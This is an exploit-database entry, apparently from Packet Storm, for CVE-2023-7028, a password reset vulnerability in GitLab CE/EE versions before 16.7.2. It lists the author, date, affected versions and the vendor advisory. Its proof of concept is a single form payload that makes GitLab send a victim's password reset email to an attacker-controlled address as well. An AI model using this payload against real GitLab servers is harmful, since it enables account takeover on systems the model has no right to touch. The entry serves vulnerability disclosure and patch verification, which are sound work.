GitLab CE/EE versions prior to 16.7.2 suffer from a password reset vulnerability.
ecc61996fa0e38b05ac70ce2080679b2eaf36720822b04f8d38867b1d69456b3# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455
# Date: 2024-01-12
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028
Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed